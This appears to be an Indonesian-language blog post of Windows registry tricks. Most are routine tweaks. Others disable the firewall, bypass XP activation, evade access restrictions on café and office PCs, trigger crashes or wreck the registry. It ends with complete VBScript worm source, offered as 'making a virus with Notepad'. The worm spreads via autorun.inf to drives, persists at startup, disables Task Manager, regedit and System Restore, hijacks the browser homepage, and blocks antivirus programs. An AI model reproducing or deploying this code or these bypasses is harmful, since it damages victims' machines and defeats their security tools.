Sabtu, 11 September 2010

Trik Registry ( REGEDIT ) Part 3

Menonaktifkan Fungsi Penginstallan Program Dari Website
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains
Buat sebuah key baru tepat dibawah Domains dan beri nama sesuai dengan nama situs yang dipilih. misalnya
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\forbidden.com
Dibawah subkey tersebut, buat sebuah DWORD Value baru dan beri nama * dan masukkan angka 4 pada Value Data.
Cara menghilangkan option “Show hidden files & Folder ” pd Folder Option :
Pergi ke Run : Regedit
HKEY_LOCAL_MACHINE | SOFTWARE | Microsoft | Windows | CurrentVersion | Explorer | Advanced | Folder | Hidden
Di bag. “Type” hilangkan kata “group”
OS : WIN XP
Memblokir aplikasi yg berjalan pd FAT 32 :
Pd run, ketik Regedit
ada 2 cara utk pemblokiran :
HKEY_LOCAL_MACHINE : utk seluruh sistem
HKEY_CURRENT_USER : utk pengguna bersangkutan
mulailah navigasi ke :
Software | Microsoft |CurrentVersion | Policies | Explorer
di jendela sblh kanan, klik kanan : Edit | New | Dword Value
ketik : DisallowRun, ketik angkanya : 1, bila ingin membatalkan pemblokiran, ketik : 0
Skrg pilih lg : Edit | New | Key & masukkan lg : DisallowRun
pindah ke subkey baru & buat sebuah daftar aplikasi yg diblokir
Utk setiap program, buatlah sebuah entri dgn : Edit | New | CharacterSet & beri angka 1 berurutan. Tutup editing dgn “Registry | Finish”, restartlah PC anda
Note : bila anda mencantumkan “Regedit.exe” di bawah HKEY_LOCAL_MACHINE, anda memblokir diri sendiri & tdk dpt membatalkan perubahan
OS : WIN XP, 2000, ME
Memproteksi data saat Shut down
Aplikasi sll menuliskan data dlm Temporary File, terkdg utk informasi sensitif spt Passwd. Stl shut down, data tsb tersimpan & mdh dibaca dgn bantuan software.
Utk menutup celah keamanan tsb, pergi ke Run : Regedit
HKEY_LOCAL_MACHINE | System | CurrentControlSet | Control | Session Manager | Memory | Management
klik 2x pd “ClearPageAtShutdown” ubah nilainya menjd 1
Bila blon ada entri tsb, buat aja dgn : “Edit | New | DwordValue”
OS : WIN 2000, XP

Memblokir folder My Recent Document

Srg jikalau kita membuka file tulisan maupun gbr ato nonton video, denger musik & segala tete bengek laennya, sll masuk dlm My Recent Docs. Nah utk menghilangkannya :
pergi ke run : Regedit
HKEY_CURRENT_USER | Software | Microsoft | Windows | CurrentVersion | Policies | Explorer
di jendela sblh kanan buat value baru dgn klik kanan : New | Binary Value
ketik : ClearRecentDocsOnExit, edit angkanya : 00 00 00 01
Sebenarnya bs sih dgn menghilangkan centang “List most recent Opened Document” pd Properties di Start Menu | Custumize | Advanced. Tp repotlah, dgn cara di atas, anda ga perlu repot2 lg mesti di “Clear List”
OS : WIN 2000, XP

Mencegah dekripsi File ketika dipindahkan

Ketika anda memindahkan file yg tlh terencrypt ke folder yg laen, pst encryptnya bakalan ilank
nah spy encryptnya ga ilank anda perlu melakukan step2 brikut ini :
pergi ke run : regedit
HKEY_USERS | Default | Software | Microsoft | Windows | CurrentVersion | Policies | Explorer
pd jendela window sebelah kanan, klik kanan : Edit | New | Dword-Value, beri nama : NoEncryptOnMove, set angkanya : 1

Non aktifkan jendela dialog “Open With” yg mengganggu

Bila sebuah file yg blon diassociate oleh program manapun, akan muncul jendela dialog yg menanyakan, apa yg ingin dilakukan dr 2 pilihan yg ada
Utk lbh praktisnya, “Open With” dpt anda aktifkan dgn cara :
Buka registry Editor, ketik di run : Regedit
HKEY_LOCAL_MACHINE | Software | Microsoft | Windows | CurrentVersion | Explorer
buat sebuah Dword baru : InternetOpenWith, ksh nilai 0
OS : WIN XP

Mengubah PC menjd IP router

buka registry editor :
HKEY_LOCAL_MACHINE | System | CurrentControlSet | Services | Tcpip | Parameter
beri nilai 1 utk : IPEnableRouter. Restart …
OS : WIN XP, 2000

Mengakhiri layanan & program lbh cepat

Ketika sebuah layanan tdk dpt diakhiri saat shutdown, komp akan menunggu ampe 20 detik
persingkatlah waktu ini dgn cara:
buka lg Registry Editor
HKEY_LOCAL_MACHINE | System | ControlSet001 | Control, cari entry : WaitToKillServiceTimeout, krgin menjd : 5000
Utk programnya :
HKEY_CURRENT_USER | ControlPanel | Desktop, cari entry : WaitToKillAppTimeout, krgin menjd : 5000
Dlm cabang yg sama, klik ganda : AutoEndTask & ubah menjd : 1
selanjutnya Windows akan mnutup aplikasi tanpa byk bertanya
OS : WIN XP, 2000

Menonaktifkan Firewall & mengaktifkan lwt Icon desktop :

Buat sebuah file notepad di desktop & tulis :
reg add ,,HKEY_LOCAL_MACHINE | SYSTEM | CurrentControlSet | Services | SharedAccess | Parameters | FirewallPolicy | StandardProfile” /v “EnableFirewall” /t
REG_DWORD /d 0000000 /f
simpan & close sbg : Off.bat
utk mengaktifkan, cukup dgn mengganti huruf 0000000 menjd 0000001
Buat menjalankan semua aplikasi yg diblokir :
Buat sebuah file teks :
reg add ,,HKEY_LOCAL_MACHINE | SYSTEM | CurrentControlSet | Services | SharedAccess | Parameters | FirewallPolicy | StandardProfile” /v “DoNotAllowExceptions” /t
REG_DWORD /d 0000001 /f
dgn ini anda bs meng-deaktifasikan semua pengecualian. Artinya semua program dlm daftar akan diijinkan berjalan.




update
JANGAN UJI COBA ADEGAN INI DI COMPUTER KAMU SENDIRI.
AKIBATNYA ATAU EFEKNYA COMPUTER KAMU AKAN DIINSTAL ULANG ALIAS FORMAT HABIS……!!!
Ok Broo, Ingat ituh……!!!
Regedit
CARA MENGGANTI NAMA “STAR” PADA STAR MENU
- jalnkan resouser hacker
- file>open>c:\windows\explorer.exe
- double click string table>37>1033>rubah teks
- klik complit serpt
- klik file-save as>explorer.exe
- HKEY_LOCAL_MACHINE | Software | Microsoft |windows nt | curennt version | winlogon
- Klik ganda shring value shell, pada value data : explorel 1.exe
Melakukan BlueScreen di Windows 2000 dan XP (heng)
1. Masuk Start lalu masuk ke RUN ketik regedit.exe
2. Buka HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\i8042prt\Parameters
3. Pilih Edit lalu pilih New, DWORD
4. Masukan nama CrashOnCtrlScroll lalu anda tekan Enter
5. Lakukan klik 2 kali di new value, lalu masukan angka 1
6. Keluar dari regedit
7. Restart komputer anda

System akan Crash jika tombol Control ditekan lalu tekan tombol Scroll Lock sebanyak 2 kali dan WIndows akan menampilkan bug check code of MANUALLY_INITIATED_CRASH (0xE2), solusi pemecahan masalah ini masuk ke Safe Mode lalu ganti Value Data menjadi angka 0.
CARA UNTUK MEMBUKA YAHOO MASSENGER LEBIH DARIH SATU
- klik star lalu biasa run n regedit
- HKEY_ CURRENT_USER\SOFTWARE\YAHOO\PAPER\TEKS
- Pilih edit lalu pilih New, DWORD
- Masukan nama plural dan tekan enter 2x
- Masukkan angka 1 di dwordnya
- Lalu keluar dan refresh berkali-kali
- Sekarang anda dapat login lebih darih satu ID
- Anda juga dapat memboot orang dengan cara ini
RESTAR OTOMATIS SAAT WINDOWS CRASH (HENG)
- klik star n run
- ketik regedit lalu enter
- HKEY_LOCAL_MACHINE\system\curentcontrolset\control\crascontrol
- Cari dword value autorebot, jika belum ada buat sendiri
- Jika sudah isikan value : 0 for nonaktif and 1 : for aktif
- Ok n restart
Cara Menghilangkan registrasi Windows XP untuk 30 hari dengan mengubah registry Windows :
Langkah-langkah :
1. klik Start lalu RUN lalu ketik regedit.exe
2. Masuk ke HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion
3. Lakukan klik kanan di "RegDone" String [REG_SZ] Value -> pilih modify -> ketik 1 di box Value -> klik ok
4. Klik kanan di Icon Internet Explorer -> buka Tools Menu -> klik Internet Options -> pilih default homepage
5. Restart komputer anda.

Jurus terakhir dan yg paling ampuh untuk mebuat OS windows mencadi amburaduh.
- klik star lalu run n ketik regedit.exe
- hapus semua hapus semua sub key yang dapat di hapus dan ketik di keyboard alt, spasi, c
- dan tunggu reagsinya
- ok joi……./oyehhhhh
DILUAR DARI REGEDIT
MEMPERCEPAT WAKTU BOOTING
- klik star run lalu notepad
- ketik di notepad : c\windows\prefetch\ntosboot-*.* /q
- lalu save di windows dengan file bat
- contohnya ntosboo.bat atau andi.bat
- kembali klik star, run lalu ketik gpedit.msc
- n enter, setelah itu cari windows seting dan klik
- kemudian plih scipts (startup/shutdown)lalu klik 2x shutdown
- n munjul kotak dialog baru, klik add lalu browse..
- carih file yang tadi kita simpan di windows
- jangan heran bilah icon nya berbentuk lain, beda dari icon notepad
- dan open, ok
- n rebot computer anda
MEMBUAT HALAMAN LOG ON SENDIRI
- buka program log on studio n klik tombol new. Isi room yg ada n klik creak
- ikuti aja wizardx
MEMBUAT IKON DARI FILE.bmp
- mudah banget
- rename aja file.bmp menjadi file.ico
MEDOFIKASI INFORMASI PD SYSTEM PROPERTIES
- buat file oeminfo.ini pd folder c:\widows\system32 dgn notepad ketikkan teks berikut :
[general]
1. menufachrer = computer janggih
2. model = model baru
[support informasion]
1. line 1 = computer cess!!!
2. line 2 = gak boleh digangguh gugat
3. line 3 = pribadi bangat isinya
4. line 4 = haram untuk yang lain
- lihat hasil di my computer>propertises>general>support informasion
MEMASANG GAMBAR DI SYSTEM PROPERTISES
- buat ganmbar dgn ukuran 180*114 pixels
- simpan dengan nama oemlogo.bmp
- simpan gambar dan copy di system32
- restar komputer
Menjengkelkan jika fasilitas MS-DOS, RUN, Find dan sebangsanya di hilangkan dari desktop di komputer warnet, biar ga terlalu BT, kita tembus aja pakek cara ini
1. Masuk ke Notepad / Wordpad / Ms Word
2. Lalu ketik dibawah ini
REGEDIT4
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableRegistryTools"=dword:00000001
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoRun"=dword:00000000
3. Simpanlah di dengan nama file berekstensi *.reg lalu jalankan file *.reg yang anda buat tadi lalu anda restart
Tujuan dari tutorial ini untuk para netter yang merasa kesal dengan komputer warnet, kantor atau sebagainya yang dimana warnet, kantor atau lainnya melakukan pembatasan hak aksesnya terlalu berlebihan terhadap komputer yang kita gunakan.
MEMATIKAN PC DALAM JARINGAN
- klik kanan desktop pilih new>shortcut
- ketik : shutdown.exe –i
- klik tombol add dan masukkan nama pc yg mau dikontrol
- pada pil what do you want…plih restar/log of/shutdown
- centang warn users of the adion dan berapa detik deleyx
- isi pesan pd tab comment
- ok
BUAT PESAN SAAT SHUTDOWN
- klik kanan dekstop new>shortcut
- ketik : shutdown.exe –s –e “ good bye gro….”
- Next >nama shortcut>finish
MEMBUAT VIRUS DENGAN MEMAKAI NOTEPAD
1. Buka Notepad
2. Copy kan kode dibawah ini:


on error resume next



dim rekur,syspath,windowpath,desades,longka,mf,isi,tf,F0nAb0530,nt,check,sd



isi = "[autorun]" & vbcrlf & "shellexecute=wscript.exe Mila.sys.vbs"

set longka = createobject("Scripting.FileSystemObject")

set mf = longka.getfile(Wscript.ScriptFullname)

dim text,size

size = mf.size

check = mf.drive.drivetype

set text = mf.openastextstream(1,-2)

do while not text.atendofstream

rekur = rekur & text.readline

rekur = rekur & vbcrlf

loop

do



Set windowpath = longka.getspecialfolder(0)

Set syspath = longka.getspecialfolder(1)

set tf = longka.getfile(syspath & "\recycle.vbs")

tf.attributes = 32

set tf = longka.createtextfile(syspath & "\recycle.vbs",2,true)

tf.write rekur

tf.close

set tf = longka.getfile(syspath & "\recycle.vbs")

tf.attributes = 39



for each desades in longka.drives



If (desades.drivetype = 1 or desades.drivetype = 2) and desades.path <> "A:" then



set tf=longka.getfile(desades.path &"\Mila.sys.vbs")

tf.attributes =32

set tf=longka.createtextfile(desades.path &"\Mila.sys.vbs",2,true)

tf.write rekur

tf.close

set tf=longka.getfile(desades.path &"\Mila.sys.vbs")

tf.attributes = 39



set tf =longka.getfile(desades.path &"\autorun.inf")

tf.attributes = 32

set tf=longka.createtextfile(desades.path &"\autorun.inf",2,true)

tf.write isi

tf.close

set tf = longka.getfile(desades.path &"\autorun.inf")

tf.attributes=39

end if

next



set F0nAb0530 = createobject("WScript.Shell")



F0nAb0530.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title",":: F0nA ::"



F0nAb0530.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Advanced\Hidden",2, "REG_DWORD"





F0nAb0530.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind", "1", "REG_DWORD"

F0nAb0530.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions", "1", "REG_DWORD"

F0nAb0530.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun", "1", "REG_DWORD"

F0nAb0530.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools", "1", "REG_DWORD"

F0nAb0530.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr", "1", "REG_DWORD"

F0nAb0530.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu", "1", "REG_DWORD"

F0nAb0530.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoTrayContextMenu", "1", "REG_DWORD"

F0nAb0530.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop\NoChangingWallpaper", "1", "REG_DWORD"

F0nAb0530.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoWinKeys", "1", "REG_DWORD"

F0nAb0530.RegWrite "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore\DisableSR", "1", "REG_DWORD"

F0nAb0530.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoLogOff", "1", "REG_DWORD"

F0nAb0530.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanel", "1", "REG_DWORD"



F0nAb0530.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU\a", "F0nAb0530-X2/1"

F0nAb0530.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU\MRUList", "a"



F0nAb0530.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption", "F0nAb0530-X2"

F0nAb0530.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeText", "Aku Sayang Mila"



F0nAb0530.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Ageia", syspath & "\recycle.vbs"



F0nAb0530.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page", "http://www.macancrew.net"



F0nAb0530.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmd.exe\Debugger",”“

F0nAb0530.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\install.exe\Debugger",”“

F0nAb0530.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe\Debugger",”“

F0nAb0530.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe\Debugger",”“

F0nAb0530.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedt32.exe\Debugger",”“

F0nAb0530.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RegistryEditor.exe\Debugger",”“

F0nAb0530.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\setup.exe\Debugger",”“

F0nAb0530.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV.exe\Debugger",”“

F0nAb0530.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-CLN.exe\Debugger",”“

F0nAb0530.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-RTP.exe\Debugger",”“

F0nAb0530.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wordpad.exe\Debugger",”“

F0nAb0530.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\VB6.exe\Debugger",”“

F0nAb0530.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\autorun.exe\Debugger",”“

F0nAb0530.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ansav.exe\Debugger",”“

F0nAb0530.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\viremoval.exe\Debugger",”“

F0nAb0530.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\viremover.exe\Debugger",”“



if check <> 1 then

Wscript.sleep 200000

end if

loop while check <> 1

set sd = createobject("Wscript.shell")

sd.run windowpath & "\explorer.exe /e,/select, " & Wscript.ScriptFullname


Save As "apaaja.vbs" tanpa Tanda kutip...

Tidak ada komentar:

Posting Komentar